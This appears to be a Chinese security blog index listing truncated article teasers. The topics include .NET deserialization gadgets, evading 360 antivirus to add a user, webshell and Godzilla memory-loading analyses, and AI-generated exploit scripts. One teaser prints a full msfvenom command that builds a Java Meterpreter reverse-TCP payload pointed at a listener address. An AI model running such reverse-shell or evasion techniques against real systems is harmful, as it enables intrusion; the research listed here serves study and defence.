免责声明 本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。 调用Windows API PowerShel...
.Net反序列化之Call Getter
引言 近日,Hexacon会议上安全研究员Piotr Bazydło公布了.Net反序列化的研究,其研究内容包括SolarWinds的一系列反序列化漏洞发现和黑名单的绕过,不安全的序列化利用,.net...
绕过 360 添加用户
Lz1y Blog 参考 Lz1y 大佬的代码, 自己改了改. 完美过 360. 用 Pyinstaller 打包 大约 4mb 左右. #!/usr/bin/python import win32a...
神兵利器 - 允许 .NET 负载反序列化并在内存中执行的负载
Aladdin 是一种基于 James Forshaw (@tiraniddo) 工作的有效负载生成技术,它允许反...
使用复杂之眼EDR排查CVE-2023-50164漏洞利用活动
使用SHC-Update漏洞数据订阅分析工具,提取CVE-2023-50164漏洞公开信息。目前CVE-2023-50164漏洞已经公开,但尚未在网上出现POC(Proof of Concept)。使...
泄露的web.config 可以rce,你造吗?
众所周知,web.config文件绝大多数情况下,我们都会当作信息泄露写至报告中,而存在web.config的网站都是net开发的,也就是asp/aspx脚本。学会本篇内容,你就会发现,你之前弄丢的一...
使用AI自动化生成漏洞检测与利用脚本以及人人都能当黑客时代的反思
前言 昨天建了一个公开漏洞POC库,想用neclei ,但是写漏洞检测的yaml实在太麻烦了。至今没有找到能够方便编写yaml的工具。平时时间就那么一点点,一个个漏洞去写岂不是累死了。 于是就想起了用...
.NET 反序列化最新攻击链 XamlImageInfo
0x01 基本介绍 XamlImageInfo类属于命名空间 System.Activities.Presentation.Internal,通常用于WPF处理与图像和图标相关的功能。本次更新的gad...
记一次对某变异webshell的分析
0x01 前言在某活动中捕获到一个变异的webshell(jsp文件格式),如图1.1所示。样本webshell的大致功能是通过加载字节码来执行恶意代码,整个webshell的核心部分逻辑是在字节码中...
分析哥斯拉内存加载Jar技术
背景哥斯拉在第一版的时候就提供了一个黑魔法:内存加载Jar功能。从当时的介绍来看,这个功能本来是为上传数据库驱动用的,后面配合JNA可以实现无文件加载ShellCode,一切都在内存中执行,大大扩展了...
Meterpreter源码分析
一、生成木马上线msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.245.129 LPORT=4444 > /home/rkabyss...
冰蝎漏洞分析另附娱乐向XSS poc
免责声明: 本公众号致力于安全研究和红队攻防技术分享等内容,本文中所有涉及的内容均不针对任何厂商或个人,同时由于传播、利用本公众号所发布的技术或工具造成的任何直接或者间接的后果及损失,均由使用者本人承...
45